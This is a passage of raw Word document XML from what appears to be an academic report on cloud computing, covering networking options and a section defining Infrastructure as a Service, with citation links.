          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>provide</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> advanced networking options </w:t>
      </w:r>
      <w:r w:rsidR="007C3B0D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>includ</w:t>
      </w:r>
      <w:r w:rsidR="007C3B0D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> private networks</w:t>
      </w:r>
      <w:r w:rsidR="00064FDE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> segmented subnets</w:t>
      </w:r>
      <w:r w:rsidR="00064FDE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> routing schemes</w:t>
      </w:r>
      <w:r w:rsidR="00064FDE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00854C72" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidR="00B15F1B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Network Address Translation)</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and firewall controls</w:t>
      </w:r>
      <w:r w:rsidR="00445B59" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00445B59" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00445B59" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uch </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">design </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>can e</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>nsure flexibility</w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> scalability and global reach</w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, in addition to help </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">organizations </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>manag</w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> physical servers and related hardware themselves</w:t>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="paragraph3"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource3"</w:instrText>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82F5B5" w14:textId="46E8243E" w:rsidR="008E5AA5" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc223521082"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="008E5AA5" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Infrastructure as a Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="343AA9F8" w14:textId="590C1E19" w:rsidR="0025361B" w:rsidRPr="00D77DFE" w:rsidRDefault="00E41FA7" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>IaaS is a </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> of cloud computing </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">delivers </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>virtual </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>computing</w:t>
      </w:r>
      <w:r w:rsidR="003D3C57" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE11EA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>features</w:t>
      </w:r>
      <w:r w:rsidR="003D3C57" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>whenever they are needed</w:t>
      </w:r>
      <w:r w:rsidR="00106ED0" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003D3C57" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00106ED0" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>helping</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> organizations to access processing power an</w:t>
      </w:r>
      <w:r w:rsidR="00106ED0" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="003D3C57" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100586" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>tora</w:t>
      </w:r>
      <w:r w:rsidR="00100586" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>e without building physical infrastructure rather than operating and maintaining</w:t>
      </w:r>
      <w:r w:rsidR="00420160" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> local</w:t>
      </w:r>
      <w:r w:rsidR="00A02D1D" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>servers’</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> disks and networking hardware</w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A02D1D" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>usinesses can rent these components from a cloud</w:t>
      </w:r>
      <w:r w:rsidR="00A02D1D" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>provider reducing upfront costs and simplifying maintenance</w:t>
      </w:r>
      <w:r w:rsidR="00AA52BA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AA52BA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00AA52BA" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>his </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>approach</w:t>
      </w:r>
      <w:r w:rsidR="00505674" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>allows resources to be</w:t>
      </w:r>
      <w:r w:rsidR="00505674" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>scaled</w:t>
      </w:r>
      <w:r w:rsidR="00505674" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00854C72" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>ynamically expanding or contracting in response to workload demands</w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>. IaaS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00854C72" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">well-suited for implementing software platforms supporting development pipelines and conducting testing </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">operations </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">providing organizations </w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">a control </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>over the configuration of their systems and network settings ensuring operational flexibility and efficiency</w:t>
      </w:r>
      <w:r w:rsidR="00555540" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00272961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="paragraph4"/>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"resource4"</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72961" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
